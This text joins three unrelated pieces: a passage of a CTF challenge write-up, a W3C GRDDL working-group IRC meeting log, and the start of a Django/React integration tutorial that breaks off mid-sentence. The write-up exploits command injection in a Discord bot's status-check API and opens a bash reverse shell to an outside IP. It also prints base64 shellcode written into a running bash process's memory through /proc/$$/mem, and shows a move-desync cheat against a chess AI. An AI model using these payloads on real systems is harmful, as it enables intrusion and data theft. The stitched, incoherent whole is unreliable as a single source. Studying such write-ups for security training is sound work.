in, but the cool commands were restricted. Looking at the source code, we can see how the restrictions are implemented: client.on('message', async (msg) => { if(msg.content.startsWith(PREFIX)) { let content = msg.content.slice(PREFIX.length); let args = content.split(" "); let cmd = args[0]; // must have "flagbot" role!!!! let isOwner = msg.guild && msg.channel.type === "text" && msg.member.roles.cache.find(r => r.name === /*"Server Booster*/ "flagbot"); // must be a bot author :) // Strellic FizzBuzz101 let isAuthor = ["140239296425754624", "480599846198312962"].includes(msg.author.id); // snip So, we can only run f!math and f!status if we are owner, which means we must have the "flagbot" role in the guild. We can only run f!play, f!loop, or f!stop if we are author, which means either me or FizzBuzz101. Sadly, most players aren't me or Fizz, and no one except us has the "flagbot" role on the server, so are other people stuck as non-owner non-author plebs? Well, no! Using Discord Developer Mode, we can grab the ID of the bot. Then we can take any bot invite URL, switch out the ID, and invite flagbot to our private Discord server! With this, we can give ourselves the "flagbot" role, allowing us access to f!math and f!status. f!math just did math using mathjs, and there was a comment saying it was not in scope. But f!status? Here's the code: else if(cmd === "status") { if(!isOwner) { return msg.reply("you are not the bot's owner!"); } fetch(API + "/check", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ url: args.slice(1).join(" ") }) }).then(r => r.text()).then(r => { return msg.reply(r); }) .catch(err => { return msg.reply(`there was an error checking for the website status!`); }); } f!status works by sending the URL to the API server, then returning to the response (side note, halfway into the CTF, the response returning was disabled). How does this API server work? Well, there are two Docker containers in a custom network, the discord container and the web container. The discord container obviously handles the bot, and the web container handles the checking of website status, and also the downloading of YouTube videos to convert to mp3 for the bot to play. How does the website status check work? Looking at the source code, we see: app.post("/check", (req, res) => { let url = req.body.url; if(!url || typeof url !== "string" || !url.startsWith(" { return res.end("invalid url!"); } exec(`curl -s --head --request GET "${url.replace(/"/g, '')}"`, {timeout: 1000}, (error, stdout, stderr) => { if(error || stderr || (!stdout.includes("200") && !stdout.includes("301"))) { return res.end(`the website is down!`); } return res.end(`the website is up!`); }); }); This snippet is vulnerable to command injection! If we inject backticks into our website, we can run any code we want in the web container! So, we run a command that gets us a reverse shell in the web container. I ran a payload like this to get a bash reverse shell: f!status -c 'bash -i >& /dev/tcp/IP/6969 0>&1'` Now, how do we get the song now that we have a shell in the container? There's API requests to /ytdl with the target YouTube ID coming from the discord container, but we are actually under heavy restrictions. We can't kill the API server since it's the root process. We can't drop a binary on the server since the whole system is read-only. Python is deleted so we can't use that. And the web container completely resets every 5 minutes as well. As far as I know, there were three solutions to get the flag: node debugger to place a breakpoint when flagbot receives the song place a tcpdump static binary somewhere in /dev where its not read-only inject shellcode into bash (hardest, also my intended lol) First path: you can use node inspect to start the NodeJS debugger, and then debug the web API server, replacing the code or placing a breakpoint at /ytdl to get the YouTube ID! But, this also had the effect of allowing people to change the results of f!status commands, and change what message would come back, which is why I ended up not showing the message from f!status. Also, someone apparently changed the code for /ytdl to point to Never Gonna Give You Up, getting a couple of people pretty good. Second path: while the entire docker container is mounted as read-only, obviously the entire file-system isn't, or nothing would really work. Some players found that /dev/shm and some other folders in /dev were not read-only, and they used this to their advantage. They download a statically-linked tcpdump binary so it would run without requiring certain libraries. Then, they would just use it to record and dump the packets, getting the YouTube ID that way. Third path: this was my solution, and I definitely knew there were easier ones. But, I liked this path so much I went straight for it and didn't search for an easier path like the first two. I saw this tweet by David Buchanan @David3141593. It shows how to run shellcode directly from bash! Obviously, since we run bash, its memory cannot be read-only. And so, he showed an exploit on how to write directly into bash's memory to run arbitrary shellcode. I had some trouble implementing it, but with the help of FizzBuzz101 on my team, we rewrote the payload. Here was my final payload: cd /proc/$$;exec 3>mem;echo "SDH/Zr8RAEgx9r4DAAgASDHSZroAA0gxwGa4KQAPBUmJx0gx/2a/AgBIMfZI/8ZIMdJIMcBmuCkADwVJicZMifdIxwQkAAAAAMdEJATH8YuxZsdEJAIPoMYEJAJIieZIMdJmuhAASDHAZrgqAA8FSIHscBEBAEyJ/0iJ5ma6//9NMdJNMclNMcBIMcBmuC0ADwUxyUgxwLh7ImlkixwMOcN0DP/BgflwEQEAdefrx0gxwGa4AQBIMf9MifdIieZIMdJmuv//DwXrrA==" | base64 -d | dd bs=1 seek=$(($((16#`cat maps | grep /bin/bash | cut -f1 -d- | head -n 1`)) + $((16#300e0))))>&3 The payload seems complex, so I'll explain it piece by piece. First, cd into /proc/$$/ which is how you write the current PID. So, we are now in the /proc/ folder of our currently running bash process. Then, create a file descriptor 3, and point it to mem. So now, we can write to FD 3, and we'll write to our proc's memory. Then echo the shellcode as base64 and decode it. Then, use dd to write into FD 3 (our memory), and do this at the start position (seek) defined as: $((16#`cat maps | grep /bin/bash | cut -f1 -d- | head -n 1`)) + $((16#300e0)) Now what is this magic line? This first reads out the maps file, showing the memory map of the bash process. Then it greps for /bin/bash, finding where the bash binary is loaded in memory. It gets the address using cut and head, and then converts it from base16 (hex) to decimal. Then, it adds that number to 0x300e0. Found by my friend Fizz, 0x300e0 is the location of bash's exit function in memory. So, this entire code segment basically overwrite's bash's exit function with our own custom shellcode. From there, we write a custom tcpdumper shellcode that reports back to our custom URL. From there, we can observe the dump sent over and get the YouTube ID! All three of these methods work in getting you the ID, and then the flag. Oh, and for those still looking for the song played, here it is :) smogofwar was a fun little misc challenge I wrote the day before the CTF. It's a website where you can play smog of war (similar to the chess variant fog of war) against an AI. You can't see your opponent's pieces, and can only see where you can move and attack. There's no checks in this game mode, but if your King gets captured you lose automatically. To get the flag, we have to beat the AI. But the AI seems a little too strong. Sometimes it just snipes me from across the board and I have no idea what happened. Looking at the source code, we can see it running Stockfish, a common chess AI. But looking closer, we see that Stockfish is actually fed all of our moves! Here's the code that handles our move: def player_move(self, data): if self.get_turn() != chess.WHITE or self.is_game_over(): return m0 = data m1 = data if isinstance(data, dict) and "_debug" in data: m0 = data["move"] m1 = data["move2"] if not self.play_move(m0): self.emit("chat", {"name": "System", "msg": "Invalid move"}) return self.emit('state', self.get_player_state()) if self.board.king(chess.BLACK) is None: self.enemy.resign() return self.enemy.lemonthink(m1) enemy_move = self.enemy.normalthink(self.get_moves()) self.play_move(enemy_move) self.emit('state', self.get_player_state()) As you can see, it runs self.enemy.lemonthink(m1), which is our move. lemonthink just plays the move on the Stockfish internal state, so Stockfish has perfect knowledge of the game board, while we do not. How are we supposed to win? Well, there's some weird code above too: m0 = data m1 = data if isinstance(data, dict) and "_debug" in data: m0 = data["move"] m1 = data["move2"] Normally, data is a string containing our move in UCI format. But if for some reason it's a dict, and there's the string "_debug" inside, it decouples our moves to m0 = data["move"] and m1 = data["move2"]. And since we play m0 on the board, and send m1 to Stockfish, we can actually desync Stockfish and the game! Using this, it should be easy to beat Stockfish, right? Well, not so fast, Stockfish actually runs many checks! Just like we do, Stockfish gets a list of possible moves it can play. It also generates how many moves it can play with its internal board state (that we can trick). If there's a discrepancy between what moves the server sends it as choices, and what moves it think it can make, it'll quit the game. There's also another hard check to bypass: since it knows the moves we make, if we make a move that we shouldn't be able to make, it also quits the game. This basically leaves us with 1 option left - we need to send the fake move as one of our last moves so that Stockfish doesn't detect it. There's no solution I can give to this part of the challenge except play the game, send fake moves, and try to trick the bot out. My friend Quintec who is actually good at chess helped me with this part, coming up with the setup: c4 e5 d4 exd4 Qxd4 Nc6 [fake Qd1 but play Qe3] then take the king Here's the code to fake a move: const fake = (realMove, fakeMove) => { socket.emit("move", {"_debug": true, "move": realMove, "move2": fakeMove}); }; This setup is almost 100% reliable, and playing it nets us the flag! You must be really interested if you actually read everything up to this point. Thanks for reading, and I hope you learned something from either playing the CTF or reading my writeup. I'm glad I got so much positive feedback about my challenges, and I really hope to make better ones next year (although it might be a tough act to follow). Thanks, and see you around. ~ Strellic / Bryce
https://brycec.me/posts/corctf_2021_challenges
CC-MAIN-2022-21
refinedweb
7,926
66.94
IRC log of grddl-wg on 2007-04-11 Timestamps are in UTC. 15:03:12 [RRSAgent] RRSAgent has joined #grddl-wg 15:03:12 [RRSAgent] logging to 15:03:29 [HarryH] HarryH has changed the topic to: GRDDL WG Meeting April 11 EST 11:00 15:04:06 [HarryH] Zakim, who's on the phone? 15:04:06 [Zakim] sorry, HarryH, I don't know what conference this is 15:04:07 [Zakim] On IRC I see RRSAgent, Zakim, HarryH, FabienG, DanC_lap, john-l, chimezie, briansuda 15:04:12 [HarryH] Zakim, this is grddl 15:04:13 [Zakim] ok, HarryH; that matches SW_GRDDL()11:00AM 15:04:24 [jjc] jjc has joined #grddl-wg 15:04:32 [john-l] Zakim, who's on the phone? 15:04:33 [Zakim] On the phone I see john-l, HarryH, Chimezie_Ogbuji, FabienG 15:05:06 [Zakim] +[IPcaller] 15:05:25 [rreck] rreck has joined #grddl-wg 15:05:35 [Zakim] + +0127368aaaa 15:05:39 [jjc] Zakim,aaaa is me 15:05:39 [Zakim] +jjc; got it 15:05:46 [HarryH] Zakim, read agenda from 15:05:46 [Zakim] working on it, HarryH 15:05:48 [Zakim] agenda+ Convene GRDDL WG meeting of 2007-04-10T11:00-0400 15:05:49 [Zakim] agendum 1 added 15:05:50 [Zakim] agenda+ GRDDL Spec: pending editorial work 15:05:52 [Zakim] agendum 2 added 15:05:55 [Zakim] agenda+ multiple values in @rel for GRDDL 15:05:56 [Zakim] agendum 3 added 15:05:57 [Zakim] agenda+ issue-http-header-links 15:05:59 [Zakim] agendum 4 added 15:06:03 [Zakim] agenda+ Test Cases: Towards Last Call 15:06:05 [Zakim] agendum 5 added 15:06:06 [chimezie] Zakim, who is on the phone? 15:06:07 [Zakim] agenda+ Advocating 15:06:09 [Zakim] agendum 6 added 15:06:11 [Zakim] agenda+ Primer 15:06:14 [Zakim] agendum 7 added 15:06:22 [Zakim] agenda+ GRDDL Spec: Last Call Comments [DONE WITHOUT DISCUSSION] 15:06:31 [Zakim] agendum 8 added 15:06:38 [Zakim] agenda+ Patent Policy 15:06:40 [Zakim] agendum 9 added 15:06:42 [Zakim] done reading agenda, HarryH 15:06:43 [HarryH] Zakim, open item 1 15:06:44 [Zakim] On the phone I see john-l, HarryH, Chimezie_Ogbuji, FabienG, [IPcaller], jjc 15:06:50 [Zakim] +??P45 15:06:52 [rreck] me 15:06:53 [briansuda] Zakim, [IPcaller] is briansuda 15:07:02 [Zakim] agendum 1. "Convene GRDDL WG meeting of 2007-04-10T11:00-0400" taken up 15:07:06 [briansuda] i was second 15:07:12 [Zakim] +briansuda; got it 15:07:38 [HarryH] chair: HarryH 15:07:39 [briansuda] Zakim, ??P45 is briansuda 15:07:39 [Zakim] +briansuda; got it 15:07:43 [HarryH] scribe: Chime 15:07:50 [HarryH] regrets: IanD 15:07:54 [john-l] Zakim, who is on the phone? 15:07:54 [Zakim] On the phone I see john-l, HarryH, Chimezie_Ogbuji, FabienG, briansuda, jjc, briansuda.a 15:07:56 [HarryH] PROPOSED: to approve GRDDL WG Weekly --4 April 2007 as a true record 15:08:04 [HarryH] 15:08:24 [john-l] 15:08:37 [john-l] 15:08:45 [briansuda] Zakim, briansuda.a is rreck 15:08:45 [Zakim] +rreck; got it 15:09:14 [HarryH] So note the real minutes are here: 15:09:21 [rreck] thanks 15:09:22 [HarryH] 15:09:36 [HarryH] RESOLVED to approve GRDDL WG Weekly --4 April 2007 as a true record 15:09:47 [HarryH] RESOLVED : approved GRDDL WG Weekly --4 April 2007 as a true record 15:10:02 [HarryH] Zakim, pick a scribe 15:10:02 [Zakim] Not knowing who is chairing or who scribed recently, I propose rreck 15:10:32 [HarryH] Reck will be scribe next meeting. 15:10:35 [HarryH] Zakim, pick a scribe 15:10:35 [Zakim] Not knowing who is chairing or who scribed recently, I propose Chimezie_Ogbuji 15:10:37 [HarryH] Zakim, pick a scribe 15:10:38 [Zakim] Not knowing who is chairing or who scribed recently, I propose john-l 15:10:46 [HarryH] Zakim, pick a scribe 15:10:46 [Zakim] Not knowing who is chairing or who scribed recently, I propose HarryH 15:10:48 [HarryH] Zakim, pick a scribe 15:10:48 [Zakim] Not knowing who is chairing or who scribed recently, I propose Chimezie_Ogbuji 15:10:49 [HarryH] Zakim, pick a scribe 15:10:49 [Zakim] Not knowing who is chairing or who scribed recently, I propose HarryH 15:10:50 [HarryH] Zakim, pick a scribe 15:10:50 [Zakim] Not knowing who is chairing or who scribed recently, I propose jjc 15:10:58 [HarryH] Jeremy? 15:11:09 [HarryH] Jeremy can scribe next meeting. 15:11:14 [HarryH] Zakim, next item 15:11:14 [Zakim] agendum 2. "GRDDL Spec: pending editorial work" taken up 15:11:37 [HarryH] DanC? 15:12:03 [HarryH] Without DanC, I suggest we move to Test Cases. 15:12:11 [HarryH] Zakim, open item 5 15:12:11 [Zakim] agendum 5. "Test Cases: Towards Last Call" taken up 15:12:55 [chimezie] 15:14:07 [chimezie] 15:14:19 [chimezie] input: 15:14:26 [chimezie] outpu: 15:14:35 [chimezie] prior approval: 15:14:39 [HarryH] PROPOSAL: Approve as a valid test for test-case document. 15:15:02 [HarryH] RESOLVED: Approved as a valid test for test-case document. 15:17:27 [chimezie] jjc: prefer test approval for material, and review WD as a whole (with test text) 15:17:43 [chimezie] john-l: same preference 15:18:44 [HarryH] ACTION: john-l to add text to 15:19:21 [HarryH] ACTION: john-l is to add text to any tests many text where deemed appropriate. 15:19:51 [chimezie] Remaining tests with prior approval: 15:19:54 [chimezie] 15:20:14 [chimezie] 15:20:22 [HarryH] PROPOSED: To reapprove in bulk all tests with prior approval. 15:20:35 [HarryH] RESOLVED: all tests with prior approval approved. 15:21:02 [chimezie] 15:21:36 [HarryH] PROPOSED: as a valid test for test-case document. 15:21:50 [HarryH] RESOLVED: as a valid test for test-case document. 15:22:03 [chimezie] 15:22:41 [chimezie] HarryH: we should approve this noting that the stylesheet may be updated 15:23:39 [chimezie] FabienG: 1) difference btwn implementation 2) RDFa spec is not stable 15:24:19 [chimezie] jjc: text should reflect that the transform does not reflect a general RDFa transform 15:24:28 [chimezie] FabienG: works fine WRT the test case 15:25:31 [chimezie] FabienG: should the transform predicate be included in the output? 15:26:11 [chimezie] FabienG: at F2F - the transform is ignored 15:26:32 [HarryH] PROPOSAL: as a valid test for test-case document. 15:26:50 [HarryH] ACTION: john-l to make sure rdfa1 test case text reflects current state of rdfa 15:27:14 [HarryH] APPROVED: Given caveat about current state of rdfa, as a valid test for test-case document. 15:27:26 [chimezie] 15:27:47 [HarryH] PROPOSAL: is a valid test for test-case document. 15:28:12 [HarryH] RESOLVED: is a valid test for test-case document. 15:28:31 [chimezie] 15:28:51 [chimezie] <head profile=" 15:28:51 [HarryH] PROPOSAL: is a valid test for test-case document. 15:28:53 [chimezie] "> 15:29:50 [chimezie] jjc: possibility that changes to the profile effected validity of output 15:29:52 [john-l] +1 15:30:00 [chimezie] jjc: we should copy these profiles to our test repository 15:30:06 [john-l] (+1 to that, rather) 15:30:14 [chimezie] jjc: would like to see the test modified in that regard 15:30:45 [HarryH] ACTION: jjc to do modify to keep all profiles in W3C space. 15:31:00 [jjc] ^W3C^GRDDL WG^ 15:31:40 [chimezie] 15:33:00 [HarryH] PROPOSAL: is a valid test for test-case document. 15:33:20 [HarryH] RESOLVED: is a valid test for test-case document. 15:34:32 [chimezie] 15:35:00 [chimezie] the ns document is served as application/rdf+xml (no controversy there) 15:35:59 [HarryH] PROPOSED: is a valid test for test-case document. 15:36:07 [Zakim] +DanC 15:36:11 [HarryH] RESOLVED: is a valid test for test-case document. 15:36:45 [HarryH] Chime: What all the controversial ones have is a "multiple output" sort of one. 15:36:53 [chimezie] 15:38:16 [chimezie] the tests with maximal results are less ambiguous 15:38:40 [chimezie] jjc: for the langconneg ppl probably pass the english version but not the german version 15:39:01 [chimezie] jjc: is there a maximal result of the merge of the english and german GRDDL results? 15:40:14 [chimezie] to calculate the maximal result, dont yo uneed to know the accept headers up front? 15:40:32 [chimezie] jjc: technically possible 15:41:00 [DanC_lap] (I'd be happy to leave the german test in the someday pile.) 15:41:06 [chimezie] ... not neccessary for testing phase 15:41:35 [DanC_lap] (actually, the IETF rules is included in W3C process, as a SHOULD) 15:41:44 [DanC_lap] (is discussion of our request for CR/PR on the agenda?) 15:41:56 [jjc] (transparent content negotiation) 15:42:15 [chimezie] 15:42:40 [chimezie] jjc: Jena reader passes the noxinclude version 15:43:00 [chimezie] 15:43:17 [chimezie] [[[ 15:43:19 [chimezie] * failed 15:43:20 [chimezie] ok: since raptor does do xinclude processing this is ok to fail 15:43:20 [chimezie] ]]] 15:43:46 [HarryH] (I'm happy to discuss CR/PR is we have time. In particular, as soon as I get EARL from Jena I'll make an implementation report, but I need Jena's results and the precise number of tests to be approved) 15:44:03 [jjc] EARL from Jena this week ... hopefully 15:45:04 [chimezie] HarryH: as long as implementations pass noxinclude I'm happy 15:45:34 [chimezie] jjc: agrees.. but we need enough evidence 15:47:07 [chimezie] 15:47:07 [HarryH] PROPOSAL: is a valid test for test-case document. 15:48:08 [HarryH] PROPOSAL: and i as a valid test for test-case document. 15:48:32 [DanC_lap] is the .html on purpose? 15:48:54 [HarryH] PROPOSAL: and as a valid test for test-case document. 15:49:00 [DanC_lap] 2nd 15:49:11 [HarryH] For previous resolutsions regards tests s/.html// 15:49:18 [DanC_lap] yes, s/.html#/#/g in resolutions of this meeting 15:49:56 [HarryH] APPROVED: and as a valid test for test-case document. 15:50:25 [chimezie] 15:51:22 [chimezie] 15:51:23 [chimezie] 15:51:33 [chimezie] if a test passes the third, can it assume it has passed the others? 15:51:42 [chimezie] the maximal result is not isomorphic with the others 15:51:54 [DanC_lap] (tests don't assume anything; they're not thinking things) 15:52:02 [HarryH] \me asks DanC - can you take over chairing at noon? I still have these meetings at noon on Wed. till early May :( 15:52:15 [chimezie] jjc: issues with the test text 15:53:26 [DanC_lap] chairing... tricky... perhaps, if we start making the transition 10 minutes before you need to go. 15:53:42 [chimezie] so is "However, for the purpose of running these tests in order to determine compliance, a GRDDL-aware agent with a security policy which does not prevent it from applying transformations identified by each test will produce the GRDDL result associated with each normative test. 15:53:47 [chimezie] " authoritative 15:54:05 [chimezie] ? 15:54:34 [chimezie] jjc: happy to approve number 3, and modify text of 1-2 15:55:16 [jjc] no delete 1-2 15:55:21 [jjc] annd modify text of 3 15:56:47 [HarryH] Note that I can't right CR transition till our test cases are fairly stable, so this test approval process is quite important. 15:57:26 [DanC_lap] you can start on the CR request at any time, harry. I find it's often good to work backwards from the goal 15:57:44 [DanC_lap] or perhaps somebody else can start on the CR request 15:58:10 [HarryH] ACTION: Chime and john-l to remove non-maximal tests from test-suite 15:59:10 [HarryH] ACTION: Chime and john-l to remove non-maximal tests with ones with security relevancy. 16:00:36 [DanC_lap] action -5 16:01:02 [chimezie] jjc: issues with general conneg and what the 'maximal' result is 16:01:21 [HarryH] ACTION: HarryH to start working on CR/PR transition report for GRDDL Spec. 16:01:42 [Zakim] -HarryH 16:02:09 [chimezie] jjc: would like to see the merge as a seperate test for conneg 16:02:50 [jjc] ACTION jjc to produce/check merge results involving content negotiation 16:03:04 [jjc] ACTION: jjc to produce/check merge results involving content negotiation 16:03:27 [DanC_lap] Zakim, agenda? 16:03:27 [Zakim] I see 8 items remaining on the agenda: 16:03:28 [Zakim] 2. GRDDL Spec: pending editorial work 16:03:31 [Zakim] 3. multiple values in @rel for GRDDL 16:03:33 [Zakim] 4. issue-http-header-links 16:03:35 [Zakim] 5. Test Cases: Towards Last Call 16:03:37 [Zakim] 6. Advocating 16:03:39 [Zakim] 7. Primer 16:03:41 [Zakim] 8. GRDDL Spec: Last Call Comments [from DONE WITHOUT DISCUSSION] 16:03:47 [Zakim] 9. Patent Policy 16:03:53 [DanC_lap] Zakim, take up item 4 16:04:05 [Zakim] agendum 4. "issue-http-header-links" taken up 16:04:05 [HarryH] I'm happy to drop this. 16:04:16 [HarryH] I'm happy to e-mail IanD and ask him to drop this. 16:04:23 [DanC_lap] WITHDRAWN. it falls to the someday pile. bonus points to anybody who picks this up and makes progress on it. 16:04:31 [DanC_lap] Zakim, close item 4 16:04:35 [Zakim] agendum 4, issue-http-header-links, closed 16:04:39 [Zakim] I see 7 items remaining on the agenda; the next one is 16:04:41 [Zakim] 2. GRDDL Spec: pending editorial work 16:05:44 [DanC_lap] agenda + base case GRDDL rule and application/xml documents 16:05:53 [DanC_lap] Zakim, take up item 10 16:05:53 [Zakim] agendum 10. "base case GRDDL rule and application/xml documents" taken up [from DanC_lap] 16:06:03 [chimezie] 16:06:19 [chimezie] [[[ 16:06:21 [chimezie] I do notice 16:06:21 [chimezie] is not of the RDF mime type, should it really be handled 16:06:21 [chimezie] as RDF/XML? 16:06:23 [chimezie] ]]] 16:08:54 [DanC_lap] DanC: this WG decided that the answer is yes, IIRC. 16:09:02 [chimezie] does this require the GRDDL-aware agent to attempt to parse all source documents as RDF/XML? 16:09:16 [HarryH] I thought there was a rule about this sort of sniffing. 16:09:22 [john-l] All application/xml source documents... 16:09:31 [HarryH] I.e. look for rdf:RDF. 16:09:39 [chimezie] the spec doesn't speak about media-type 16:09:45 [chimezie] just 'conforming RDF/XML' 16:10:11 [john-l] But if it's conforming RDF/XML, then it must also be XML, so anything that's not in an XML media type could not be a conforming RDF/XML document. 16:10:34 [chimezie] RDF/XML spec doesn't define conformance by anything other than the content not the media-type over the wire 16:10:49 [HarryH] In which case we're okay as regards RDF/XML. 16:11:07 [HarryH] So, one can serve RDF/XML as application/xml and still interpret it as RDF. 16:11:19 [HarryH] We might want to bring this up explicitly in informative text. 16:11:37 [HarryH] However, we should remember that we don't want to tie the spec to RDF/XML. 16:12:00 [DanC_lap] the relevant WG decision is under feb 7 under 16:13:39 [jjc] 16:13:43 [chimezie] .. discussion continues on what RDF/XML 'conformance' is .. 16:13:44 [DanC_lap] "If an information resource IR is represented by a conforming RDF/XML document[RDFX], then the RDF graph represented by that document is a GRDDL result of IR" 16:13:58 [HarryH] What if IR is in N3? 16:14:03 [HarryH] Sorry for asking the question :( 16:14:15 [HarryH] It's a real edge-case. 16:15:02 [DanC_lap] then the premise of that rule isn't satisfied and you gotta look elsewhere, Harry 16:15:11 [HarryH] Hmmm... 16:15:15 [DanC_lap] <foo/> 16:15:35 [HarryH] Is there a notion of RDF conformance that isn't tied to RDF/XML? 16:15:39 [chimezie] DanC_lap: is a conforming RDF/XML document 16:15:59 [DanC_lap] <foo xmlns=" " /> 16:17:05 [HarryH] I'll just have to re-read the spec and look for this...anyways, feel free to ignore my comments as I'm not on the phone. 16:17:20 [jjc] If an information resource IR is represented by a conforming RDF/XML document[RDFX], then the RDF graph represented by that document is a GRDDL result of IR. 16:18:03 [john-l] What about what about application/rdf+xml? 16:18:10 [Zakim] -briansuda 16:19:02 [chimezie] 16:19:47 [DanC_lap] DanC nominates jjc to review this sq1 test 16:20:31 [DanC_lap] JJC: sq1 is not problematic; it bears the rdf:RDF root element 16:20:38 [DanC_lap] ... or... hmm... 16:23:12 [DanC_lap] (the TAG concurred with the idea that the root element namespace URI works as an alternative to a MIME type decl) 16:24:25 [HarryH] +` root element namespace URI working as an alternatie to MIME type. 16:24:50 [HarryH] +1 16:25:46 [DanC_lap] ACTION JohnL: 16:26:44 [DanC_lap] Zakim, close this agendum 16:26:44 [Zakim] agendum 10 closed 16:26:46 [Zakim] I see 7 items remaining on the agenda; the next one is 16:26:47 [Zakim] 2. GRDDL Spec: pending editorial work 16:26:58 [DanC_lap] Zakim, take up item 2 16:26:58 [Zakim] agendum 2. "GRDDL Spec: pending editorial work" taken up 16:27:37 [DanC_lap] DanC collects advice on the xml pi appendix 16:28:03 [DanC_lap] ADJOURN 16:28:14 [chimezie] Zakim, list participants 16:28:14 [Zakim] As of this point the attendees have been john-l, HarryH, Chimezie_Ogbuji, FabienG, +0127368aaaa, jjc, briansuda, rreck, DanC 16:28:21 [chimezie] RRSAgent, make logs public 16:28:30 [chimezie] RRSAgent, generate minutes 16:28:30 [RRSAgent] I have made the request to generate chimezie 16:29:14 [Zakim] -rreck 16:29:16 [Zakim] -john-l 16:30:57 [HarryH] DanC - if you want to chat via IRC I'm still here. 16:31:28 [HarryH] I'd like to get an update on Samsung/Citigroup situation. 16:31:32 [HarryH] Time is getting critical here. 16:31:45 [HarryH] If they don't sign off, I don't think we can go to PR. 16:31:56 [DanC_lap] is there some reason you didn't link the survey from the agenda? I guess I'll hunt it down yet again... 16:32:08 [HarryH] It should be in previous minutes. 16:32:11 [HarryH] From last meeting. 16:32:22 [HarryH] Apologies, I am working very hard on HASTAC stuff so my time is limited right now. 16:32:31 [HarryH] Will be back on board more full time post HASTAC. 16:33:56 [HarryH] 16:34:02 [HarryH] That's the URI. 16:34:24 [HarryH] DanC? 16:35:35 [jjc] samsung still outstanding 16:35:43 [HarryH] ARGH. 16:36:07 [HarryH] Steve Bratt had the W3C Rep Asia phone them, he reports they know about problem. 16:36:32 [HarryH] I'll e-mail a number of people at Samsung and Steve and Ian again. 16:36:42 [DanC_lap] only samsung has not answered 16:36:57 [Zakim] -Chimezie_Ogbuji 16:36:59 [Zakim] -DanC 16:37:01 [Zakim] -FabienG 16:37:04 [Zakim] -jjc 16:37:05 [Zakim] SW_GRDDL()11:00AM has ended 16:37:06 [Zakim] Attendees were john-l, HarryH, Chimezie_Ogbuji, FabienG, +0127368aaaa, jjc, briansuda, rreck, DanC 16:37:13 [chimezie] whoops 16:37:47 [DanC_lap] harry, don't send to many emails to samsung. we don't want to come across as nagging 16:37:51 [DanC_lap] too many 16:38:04 [DanC_lap] feel free to nag Ian and SteveB and me; we're paid to take it 16:38:08 [HarryH] OK. 16:38:16 [HarryH] I think phone-calls are the way to go with Samsung. 16:38:43 [HarryH] As regards Primer, John Madden sent me draft text off-list. I think. 16:38:52 [HarryH] But it seems incomplete. 16:38:59 [DanC_lap] I wonder if anyone has mentioned the option of resiginging from the WG to samsung 16:39:06 [HarryH] That might work. 16:39:18 [DanC_lap] I think I'm going to leave it to Ian for a bit. 16:39:31 [HarryH] We only have like 2 1/2 weeks I think to sort this out. 16:39:34 [HarryH] So getting worried. 16:39:47 [DanC_lap] what happens in 2 1/2 weeks? 16:40:00 [DanC_lap] you want to send a request for CR? or PR? 16:40:27 [HarryH] Yep. 16:40:41 [HarryH] I was hoping for end of April. 16:41:49 [DanC_lap] I think it'll be a good use of time to start drafting that request. you'll be able to see how compelling our case is 16:42:24 [DanC_lap] if this samsung detail is the only problem, and it's clear that a big part of the web community is ready for this thing to move forward, that puts us in a reasonably good negotiating position. 16:42:48 [HarryH] Of course our case is compelling. 16:42:54 [HarryH] :) 16:43:52 [HarryH] I'm just concerned about the "table of EARL results" of implementations that let's us go straight to PR.. 16:44:05 [HarryH] I don't want to make the wrong table and need Jeremy's results in EARL to make this. 16:44:19 [HarryH] I want *one* CR/PR request. Not to make two. 16:44:25 [HarryH] Otherwise our schedule goes off. 16:45:31 [HarryH] So, I'm sort of waiting for all the EARL results and test-case stabilization, which seems like it will happen by next meeting. 16:48:59 [HarryH] OK. 16:49:20 [HarryH] Anyways, I'll take an action to make CR/PR request next meeting. 16:49:23 [HarryH] Gotta run. 16:49:24 [HarryH] Bye! 18:17:48 [DanC_lap] DanC_lap has joined #grddl-wg 19:13:20 [DanC_lap] DanC_lap has joined #grddl-wg 21:23:08 [DanC_lap] DanC_lap has joined #grddl-wg
http://www.w3.org/2007/04/11-grddl-wg-irc
CC-MAIN-2016-26
refinedweb
3,858
67.59
Studio The first time you use Studio, you must pick a namespace. As with the Terminal, choose SAMPLES. If this isn't the first time you're using Studio, you'll connect to the last namespace you used. To change to the SAMPLES namespace, click File –> Change Namespace. Once you connect, you'll see the Studio interface, and a default (empty) project called Project1. Click here for a brief description of the interface (use your browser's Back button to return here). All the examples used in this tutorial are included for your reference in the in the BAS project, in SAMPLES. To load them, click File –> Open Project, and choose BAS. After the project opens, you'll see that the Routines folder contains the source code. Click File –> New Project to create a new project (back to Project1). As you work, you can easily switch back and forth between this and the BAS project by using File –> Recent Projects. You'll assign your project a better name (such as MyWork) when you save it.
https://docs.intersystems.com/latest/csp/docbook/DocBook.UI.Page.cls?KEY=TBAS_Studio
CC-MAIN-2022-33
refinedweb
175
82.65
Making React and Django play well together — the “hybrid app” model Also available at fractalideas.com, with syntax highlighting. Last month I discussed the trade-offs involved in choosing an architecture for integrating React with Django. I described an alternative between two models: - The “single page app” model: a standalone JavaScript frontend makes API requests to a backend running on another domain. - The “hybrid app” model: the same backend serves HTML pages embedding JavaScript components and API requests. I promised that I would describe how to implement each model. Today I’m starting with the “hybrid app” model. Let’s bootstrap a todolist app!¹ Disclaimer: I’m starting with default project templates and making minimal changes in order to focus on the integration between frontend and backend. As a consequence, I’m ignoring many best practices for Django and React projects. Keep in mind that I’m describing only one piece of the puzzle and that many variants are possible! Why build a “hybrid app”? Here are the main reasons: - Your app needs good SEO (e-commerce, classifieds, portfolios, etc.) - You prefer treating your app as a single unit because that’s more convenient for building new features, running integration tests, and deploying new versions. - You have a team of full-stack developers — perhaps a team of one — and you’d rather avoid the overhead of managing separate backend and frontend projects. - You’re comfortable with building full-stack apps with Django and you want to try a modern JavaScript framework while leveraging your experience. While the “hybrid app” model feels a bit old-school, it’s good for enhancing the frontend of backend-heavy apps — whether new or pre-existing — without disruption. Initialization Since the frontend and the backend are deployed together, it makes sense to maintain them in the same code repository. Let’s initialize Django and React applications in backend and frontend directories at the root of the repository.² Django Start a shell, go to the root of the code repository and bootstrap the backend: mkdir backend cd backend pipenv install django pipenv shell django-admin startproject todolist . For convenience, edit the Django settings as follows. This will make it easier to switch between development and production mode. # backend/todolist/settings.py # insert these lines after the definition of BASE_DIR BACKEND_DIR = BASE_DIR # rename variable for clarity FRONTEND_DIR = os.path.abspath( os.path.join(BACKEND_DIR, '..', 'frontend')) # modify the definition of DEBUG and ALLOWED_HOSTS DEBUG = os.environ.get('DJANGO_ENV') == 'development' ALLOWED_HOSTS = ['localhost'] Start the development server: # in the backend directory, after 